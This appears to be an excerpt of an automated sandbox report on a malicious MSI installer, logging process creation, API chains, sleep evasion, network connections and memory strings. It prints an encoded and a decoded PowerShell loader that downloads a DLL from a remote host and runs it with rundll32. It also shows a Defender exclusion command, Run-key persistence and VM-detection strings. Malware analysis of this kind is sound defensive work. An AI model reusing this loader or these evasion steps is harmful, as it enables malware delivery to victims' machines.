      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_7-4540
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5984Thread sleep time: -5534023222112862s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exe TID: 1604Thread sleep time: -109000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exe TID: 5304Thread sleep time: -109000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exe TID: 492Thread sleep time: -109000s >= -30000s
      Source: C:\Windows\SysWOW64\rundll32.exe TID: 5960Thread sleep count: 38 > 30
      Source: C:\Windows\SysWOW64\rundll32.exe TID: 5960Thread sleep time: -190000s >= -30000s
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04A09C20 RegQueryValueExA,GetModuleFileNameW,lstrcpyW,lstrlenW,lstrlenW,ExpandEnvironmentStringsW,lstrlenW,lstrcatW,GetEnvironmentVariableW,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,GetCurrentProcessId,GetCurrentProcessId,ProcessIdToSessionId,GetTickCount,GetModuleHandleA,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetProcessWindowStation,GetUserObjectInformationW,GetUserObjectInformationW,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationW,GetUserNameW,GetComputerNameW,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,Process32FirstW,Process32NextW,lstrcpynW,CloseHandle,WTSGetActiveConsoleSessionId,lstrcpyA,CreateDCA,CreateDCA,GetDeviceCaps,GetDeviceCaps,GetDesktopWindow,GetDesktopWindow,MonitorFromWindow,MonitorFromWindow,GetDesktopWindow,MonitorFromWindow,LoadLibraryA,7_2_04A09C20
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9674Jump to behavior
      Source: C:\Windows\Installer\MSI5344.tmpCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_3-18831
      Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_7-4363
      Source: C:\Windows\Installer\MSI5344.tmpAPI coverage: 5.8 %
      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI48BD.tmpJump to dropped file
      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI4B9F.tmpJump to dropped file
      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI494B.tmpJump to dropped file
      Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_7-4458
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 109000Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 109000Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 109000
      Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_7-4268
      Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_7-4588
      Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end node
      Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end node
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: 4641a8.msi.1.drBinary or memory string: RegOpenKeyTransactedW::NetUserGetInfo() failed with error: \@invalid string_view positionVMware, Inc.VMware Virtual PlatformVMware7,1innotek GmbHVirtualBoxMicrosoft CorporationVirtual MachineVRTUALACRSYSA M IGetting system informationManufacturer [Model [BIOS [\\?\UNC\\\?\shim_clone%d.%d.%d.%dDllGetVersion[%!]%!ProgramFilesFolderCommonFilesFolderDesktopFolderAllUsersDesktopFolderAppDataFolderFavoritesFolderStartMenuFolderProgramMenuFolderStartupFolderFontsFolderLocalAppDataFolderCommonAppDataFolderProgramFiles64FolderProgramFilesProgramW6432SystemFolderSystem32FolderWindowsFolderWindowsVolumeTempFolderSETUPEXEDIRshfolder.dllSHGetFolderPathWProgramFilesAPPDATAPROGRAMFILES&+
      Source: powershell.exe, 00000004.00000002.381153718.0000011A283F9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.846728997.00000000035CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04A07390 SHGetFolderPathW,RegOpenKeyExA,SHGetFolderPathW,lstrlenW,lstrlenW,lstrlenA,lstrlenA,lstrlenA,SHGetFolderPathW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,7_2_04A07390
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04A07750 RegQueryValueExA,ExpandEnvironmentStringsW,lstrlenW,lstrcatW,FindFirstFileW,lstrcatA,lstrcatW,lstrcatW,GetFileAttributesW,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcpyW,CreateProcessW,CloseHandle,CloseHandle,lstrcatA,lstrcatA,lstrlenW,lstrcatA,lstrcatW,lstrcatW,FindNextFileW,FindClose,7_2_04A07750
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04A03AA0 GetFileAttributesW,lstrlenW,lstrcmpiW,lstrlenW,CreateDirectoryW,FindFirstFileW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,CopyFileW,SetFileAttributesW,FindNextFileW,lstrcatW,FindClose,7_2_04A03AA0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04A03D50 lstrcpyW,lstrcpyW,lstrcpyW,FindFirstFileW,lstrcatW,lstrcatW,lstrcatW,CopyFileW,FindNextFileW,FindClose,7_2_04A03D50
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00FC7750 RegQueryValueExA,ExpandEnvironmentStringsW,lstrlenW,lstrcatW,FindFirstFileW,lstrcatA,lstrcatW,lstrcatW,GetFileAttributesW,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcpyW,CreateProcessW,CloseHandle,CloseHandle,lstrcatA,lstrcatA,lstrlenW,lstrcatA,lstrcatW,lstrcatW,FindNextFileW,FindClose,9_2_00FC7750
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00FC3AA0 GetFileAttributesW,lstrlenW,lstrcmpiW,lstrlenW,CreateDirectoryW,FindFirstFileW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,CopyFileW,SetFileAttributesW,FindNextFileW,lstrcatW,FindClose,9_2_00FC3AA0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00FC7390 SHGetFolderPathW,RegOpenKeyExA,SHGetFolderPathW,lstrlenW,lstrlenW,lstrlenA,lstrlenA,lstrlenA,SHGetFolderPathW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,9_2_00FC7390
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00FC3D50 lstrcpyW,lstrcpyW,lstrcpyW,FindFirstFileW,lstrcatW,lstrcatW,lstrcatW,CopyFileW,FindNextFileW,FindClose,9_2_00FC3D50
      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04A09C20 RegQueryValueExA,GetModuleFileNameW,lstrcpyW,lstrlenW,lstrlenW,ExpandEnvironmentStringsW,lstrlenW,lstrcatW,GetEnvironmentVariableW,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,GetCurrentProcessId,GetCurrentProcessId,ProcessIdToSessionId,GetTickCount,GetModuleHandleA,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetProcessWindowStation,GetUserObjectInformationW,GetUserObjectInformationW,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationW,GetUserNameW,GetComputerNameW,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,Process32FirstW,Process32NextW,lstrcpynW,CloseHandle,WTSGetActiveConsoleSessionId,lstrcpyA,CreateDCA,CreateDCA,GetDeviceCaps,GetDeviceCaps,GetDesktopWindow,GetDesktopWindow,MonitorFromWindow,MonitorFromWindow,GetDesktopWindow,MonitorFromWindow,LoadLibraryA,7_2_04A09C20
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001A90 WTSEnumerateSessionsA,SetErrorMode,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,7_2_10001A90
      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI5344.tmp "C:\Windows\Installer\MSI5344.tmp" /DontWait /HideWindow powershell.exe -Exec Bypass -enc JABmAHIAbwBtACAAPQAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAATIFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAEwAaQB0AGUAcwBvAGYAdABcAEkAbgBzAHQAYQBsAGwAIgApAC4AUABhAHQAaAAgAC0AbABlAGEAZgA7AA0ACgAkAGQAaQByACAAPQAgACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAOwANAAoAJABmAG4AIAA9ACAAJABkAGkAcgAgACsAIAAiAFwAIgAgACsAIAAoAEcAZQB0AC0AUgBhAG4AZABvAG0AKQAuAFQAbwBTAHQAcgBpAG4AZwAoACIAeAA4ACIAKQAgACsAIAAiAC4AZABhAHQAIgANAAoAJAB3AGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AA0ACgAkAGQAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AZABvAHcAbgBsAG8AYQBkAC0AYwBkAG4ALgBjAG8AbQAiADsADQAKACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGQAIAArACAAIgAvAGQAbwB3AG4AbABvAGEAZAAuAHAAaABwAD8AZgA9AEwAZAByAHAALgBkAGwAbAAmAGYAcgBvAG0APQAiACAAKwAgACQAZgByAG8AbQAsACAAJABmAG4AKQA7AA0ACgAkAHIAYQB3ACAAPQAgACIATQBaACIAIAArACAAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAFAAYQB0AGgAIAAkAGYAbgAgAC0AUgBhAHcAKQAuAFIAZQBtAG8AdgBlACgAMAAsACAAMgApADsADQAKAFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACgAJABmAG4AKQAgAC0ATgBvAE4AZQB3AGwAaQBuAGUAIAAtAFYAYQBsAHUAZQAgACQAcgBhAHcADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACgAJwAiACcAIAArACAAJABmAG4AIAArACAAJwAiACwARABsAGwAUgBlAGcAaQBzAHQAZQByAFMAZQByAHYAZQByACcAKQA7AA==Jump to behavior
      Source: C:\Windows\Installer\MSI5344.tmpCode function: 3_2_00007FF7AF6E1B88 GetLastError,IsDebuggerPresent,OutputDebugStringW,3_2_00007FF7AF6E1B88
      Source: C:\Windows\Installer\MSI5344.tmpCode function: 3_2_00007FF7AF6E1B88 GetLastError,IsDebuggerPresent,OutputDebugStringW,3_2_00007FF7AF6E1B88
      Source: C:\Windows\Installer\MSI5344.tmpCode function: 3_2_00007FF7AF6D2DE0 GetProcessHeap,_Init_thread_footer,_Init_thread_footer,3_2_00007FF7AF6D2DE0
      Source: C:\Windows\Installer\MSI5344.tmpCode function: 3_2_00007FF7AF7090A4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00007FF7AF7090A4
      Source: C:\Windows\Installer\MSI5344.tmpCode function: 3_2_00007FF7AF70F3F4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FF7AF70F3F4
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04A03660 GetComputerNameA,lstrcmpiA,lstrcmpiA,GetUserNameA,lstrcmpiA,SetErrorMode,SetUnhandledExceptionFilter,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,CharLowerA,lstrcpyA,LoadLibraryA,GetProcAddress,wsprintfA,wsprintfA,GetEnvironmentVariableA,SetEnvironmentVariableA,wsprintfA,OpenFileMappingA,CreateFileMappingA,MapViewOfFile,OpenProcess,TerminateProcess,Sleep,CloseHandle,GetCurrentProcessId,RegQueryValueExA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,inet_addr,CreateThread,WaitForSingleObject,ExitThread,7_2_04A03660
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00FC3660 GetComputerNameA,lstrcmpiA,lstrcmpiA,GetUserNameA,lstrcmpiA,SetErrorMode,SetUnhandledExceptionFilter,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,CharLowerA,lstrcpyA,LoadLibraryA,GetProcAddress,wsprintfA,wsprintfA,GetEnvironmentVariableA,SetEnvironmentVariableA,wsprintfA,OpenFileMappingA,CreateFileMappingA,MapViewOfFile,OpenProcess,TerminateProcess,Sleep,CloseHandle,GetCurrentProcessId,RegQueryValueExA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,inet_addr,CreateThread,WaitForSingleObject,ExitThread,9_2_00FC3660

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 152.89.196.75 443Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 64.190.113.123 443
      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: download-cdn.com
      Source: unknownProcess created: Base64 decoded $from = Split-Path (Get-ItemProperty Path "HKCU:\SOFTWARE\Litesoft\Install").Path -leaf;$dir = $env:programdata;$fn = $dir + "\" + (Get-Random).ToString("x8") + ".dat"$wc = New-Object System.Net.WebClient;$d = "https://download-cdn.com";$wc.DownloadFile($d + "/download.php?f=Ldrp.dll&from=" + $from, $fn);$raw = "MZ" + (Get-Content -Path $fn -Raw).Remove(0, 2);Set-Content -Path ($fn) -NoNewline -Value $rawStart-Process -FilePath rundll32.exe -ArgumentList ('"' + $fn + '",DllRegisterServer');
      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI5344.tmp "c:\windows\installer\msi5344.tmp" /dontwait /hidewindow powershell.exe -exec bypass -enc jabmahiabwbtacaapqagafmacabsagkadaatafaayqb0aggaiaaoaecazqb0ac0asqb0aguabqbqahiabwbwaguacgb0ahkaiaatifaayqb0aggaiaaiaegaswbdafuaogbcafmatwbgafqavwbbafiarqbcaewaaqb0aguacwbvagyadabcaekabgbzahqayqbsagwaigapac4auabhahqaaaagac0abablageazga7aa0acgakagqaaqbyacaapqagacqazqbuahyaogbwahiabwbnahiayqbtagqayqb0ageaowanaaoajabmag4aiaa9acaajabkagkacgagacsaiaaiafwaigagacsaiaaoaecazqb0ac0augbhag4azabvag0akqauafqabwbtahqacgbpag4azwaoaciaeaa4aciakqagacsaiaaiac4azabhahqaiganaaoajab3agmaiaa9acaatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4atgblahqalgbxaguaygbdagwaaqblag4adaa7aa0acgakagqaiaa9acaaigboahqadabwahmaogavac8azabvahcabgbsag8ayqbkac0aywbkag4algbjag8abqaiadsadqakacqadwbjac4arabvahcabgbsag8ayqbkaeyaaqbsaguakaakagqaiaaracaaigavagqabwb3ag4ababvageazaauahaaaabwad8azga9aewazabyahaalgbkagwabaamagyacgbvag0apqaiacaakwagacqazgbyag8abqasacaajabmag4akqa7aa0acgakahiayqb3acaapqagaciatqbaaciaiaaracaakabhaguadaataemabwbuahqazqbuahqaiaatafaayqb0aggaiaakagyabgagac0augbhahcakqauafiazqbtag8adgblacgamaasacaamgapadsadqakafmazqb0ac0aqwbvag4adablag4adaagac0auabhahqaaaagacgajabmag4akqagac0atgbvae4azqb3agwaaqbuaguaiaatafyayqbsahuazqagacqacgbhahcadqakafmadabhahiadaatafaacgbvagmazqbzahmaiaataeyaaqbsaguauabhahqaaaagahiadqbuagqababsadmamgauaguaeablacaalqbbahiazwb1ag0azqbuahqatabpahmadaagacgajwaiaccaiaaracaajabmag4aiaaracaajwaiacwarabsagwaugblagcaaqbzahqazqbyafmazqbyahyazqbyaccakqa7aa==
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -exec bypass -enc jabmahiabwbtacaapqagafmacabsagkadaatafaayqb0aggaiaaoaecazqb0ac0asqb0aguabqbqahiabwbwaguacgb0ahkaiaatifaayqb0aggaiaaiaegaswbdafuaogbcafmatwbgafqavwbbafiarqbcaewaaqb0aguacwbvagyadabcaekabgbzahqayqbsagwaigapac4auabhahqaaaagac0abablageazga7aa0acgakagqaaqbyacaapqagacqazqbuahyaogbwahiabwbnahiayqbtagqayqb0ageaowanaaoajabmag4aiaa9acaajabkagkacgagacsaiaaiafwaigagacsaiaaoaecazqb0ac0augbhag4azabvag0akqauafqabwbtahqacgbpag4azwaoaciaeaa4aciakqagacsaiaaiac4azabhahqaiganaaoajab3agmaiaa9acaatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4atgblahqalgbxaguaygbdagwaaqblag4adaa7aa0acgakagqaiaa9acaaigboahqadabwahmaogavac8azabvahcabgbsag8ayqbkac0aywbkag4algbjag8abqaiadsadqakacqadwbjac4arabvahcabgbsag8ayqbkaeyaaqbsaguakaakagqaiaaracaaigavagqabwb3ag4ababvageazaauahaaaabwad8azga9aewazabyahaalgbkagwabaamagyacgbvag0apqaiacaakwagacqazgbyag8abqasacaajabmag4akqa7aa0acgakahiayqb3acaapqagaciatqbaaciaiaaracaakabhaguadaataemabwbuahqazqbuahqaiaatafaayqb0aggaiaakagyabgagac0augbhahcakqauafiazqbtag8adgblacgamaasacaamgapadsadqakafmazqb0ac0aqwbvag4adablag4adaagac0auabhahqaaaagacgajabmag4akqagac0atgbvae4azqb3agwaaqbuaguaiaatafyayqbsahuazqagacqacgbhahcadqakafmadabhahiadaatafaacgbvagmazqbzahmaiaataeyaaqbsaguauabhahqaaaagahiadqbuagqababsadmamgauaguaeablacaalqbbahiazwb1ag0azqbuahqatabpahmadaagacgajwaiaccaiaaracaajabmag4aiaaracaajwaiacwarabsagwaugblagcaaqbzahqazqbyafmazqbyahyazqbyaccakqa7aa==
      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI5344.tmp "c:\windows\installer\msi5344.tmp" /dontwait /hidewindow powershell.exe -exec bypass -enc jabmahiabwbtacaapqagafmacabsagkadaatafaayqb0aggaiaaoaecazqb0ac0asqb0aguabqbqahiabwbwaguacgb0ahkaiaatifaayqb0aggaiaaiaegaswbdafuaogbcafmatwbgafqavwbbafiarqbcaewaaqb0aguacwbvagyadabcaekabgbzahqayqbsagwaigapac4auabhahqaaaagac0abablageazga7aa0acgakagqaaqbyacaapqagacqazqbuahyaogbwahiabwbnahiayqbtagqayqb0ageaowanaaoajabmag4aiaa9acaajabkagkacgagacsaiaaiafwaigagacsaiaaoaecazqb0ac0augbhag4azabvag0akqauafqabwbtahqacgbpag4azwaoaciaeaa4aciakqagacsaiaaiac4azabhahqaiganaaoajab3agmaiaa9acaatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4atgblahqalgbxaguaygbdagwaaqblag4adaa7aa0acgakagqaiaa9acaaigboahqadabwahmaogavac8azabvahcabgbsag8ayqbkac0aywbkag4algbjag8abqaiadsadqakacqadwbjac4arabvahcabgbsag8ayqbkaeyaaqbsaguakaakagqaiaaracaaigavagqabwb3ag4ababvageazaauahaaaabwad8azga9aewazabyahaalgbkagwabaamagyacgbvag0apqaiacaakwagacqazgbyag8abqasacaajabmag4akqa7aa0acgakahiayqb3acaapqagaciatqbaaciaiaaracaakabhaguadaataemabwbuahqazqbuahqaiaatafaayqb0aggaiaakagyabgagac0augbhahcakqauafiazqbtag8adgblacgamaasacaamgapadsadqakafmazqb0ac0aqwbvag4adablag4adaagac0auabhahqaaaagacgajabmag4akqagac0atgbvae4azqb3agwaaqbuaguaiaatafyayqbsahuazqagacqacgbhahcadqakafmadabhahiadaatafaacgbvagmazqbzahmaiaataeyaaqbsaguauabhahqaaaagahiadqbuagqababsadmamgauaguaeablacaalqbbahiazwb1ag0azqbuahqatabpahmadaagacgajwaiaccaiaaracaajabmag4aiaaracaajwaiacwarabsagwaugblagcaaqbzahqazqbyafmazqbyahyazqbyaccakqa7aa==Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\ProgramData\435f8fae.dat",DllRegisterServer Jump to behavior
      Source: C:\Windows\Installer\MSI5344.tmpCode function: 3_2_00007FF7AF6D6650 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,AllowSetForegroundWindow,GetModuleHandleW,GetProcAddress,Sleep,EnumWindows,BringWindowToTop,WaitForSingleObject,GetExitCodeProcess,3_2_00007FF7AF6D6650
      Source: rundll32.exe, 00000007.00000002.380387384.0000000004A15000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 0Eroot\SecurityCenter2root\SecurityCenterWQLSelect * From AntiVirusProductdisplayName%PROGRAMDATA%\Defaultrundll32.exe "",#1m_svc /sysWinsta0\Defaultopenrunaspowershell.exe -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "explorer.exe %LOCALAPPDATA%LocalLow\Chrome_RenderWidgetHostHWNDDirectUIHWNDClient CaptionSIBBarHostDesktopProgramsMFUMoreProgramsPaneDesktop More Programs PaneNamespaceTreeControl#32768NetUIHWNDSysTreeView32SysListView32Button#32770EditComboBoxComboBoxEx32DUIViewWndClassNameFloatNotifySinkProgmanProgram ManagerSHELLDLL_DefViewFolderViewShell_TrayWndReBarWindow32MSTaskSwWClassMSTaskListWClassSIBJumpViewDV2ControlHostDesktopDestinationList\explorer.exeSOFTWARE\Microsoft\Windows\CurrentVersion\Run39f848a1" /c () > "" 2>&1%08lx
      Source: rundll32.exe, 00000009.00000002.401900486.0000000000FD5000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 0oroot\SecurityCenter2root\SecurityCenterWQLSelect * From AntiVirusProductdisplayName%PROGRAMDATA%\Defaultrundll32.exe "",#1m_svc /sysWinsta0\Defaultopenrunaspowershell.exe -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "explorer.exe %LOCALAPPDATA%LocalLow\Chrome_RenderWidgetHostHWNDDirectUIHWNDClient CaptionSIBBarHostDesktopProgramsMFUMoreProgramsPaneDesktop More Programs PaneNamespaceTreeControl#32768NetUIHWNDSysTreeView32SysListView32Button#32770EditComboBoxComboBoxEx32DUIViewWndClassNameFloatNotifySinkProgmanProgram ManagerSHELLDLL_DefViewFolderViewShell_TrayWndReBarWindow32MSTaskSwWClassMSTaskListWClassSIBJumpViewDV2ControlHostDesktopDestinationList\explorer.exeSOFTWARE\Microsoft\Windows\CurrentVersion\Run39f848a1" /c () > "" 2>&1%08lx
      Source: C:\Windows\Installer\MSI5344.tmpCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_00007FF7AF72C098
      Source: C:\Windows\Installer\MSI5344.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_00007FF7AF72BEBC
      Source: C:\Windows\Installer\MSI5344.tmpCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,3_2_00007FF7AF72B664
      Source: C:\Windows\Installer\MSI5344.tmpCode function: EnumSystemLocalesW,3_2_00007FF7AF724610
      Source: C:\Windows\Installer\MSI5344.tmpCode function: GetLocaleInfoEx,3_2_00007FF7AF7083E0
      Source: C:\Windows\Installer\MSI5344.tmpCode function: GetLocaleInfoW,3_2_00007FF7AF724B54
      Source: C:\Windows\Installer\MSI5344.tmpCode function: EnumSystemLocalesW,3_2_00007FF7AF72BA80
      Source: C:\Windows\Installer\MSI5344.tmpCode function: EnumSystemLocalesW,3_2_00007FF7AF72B9B0
      Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
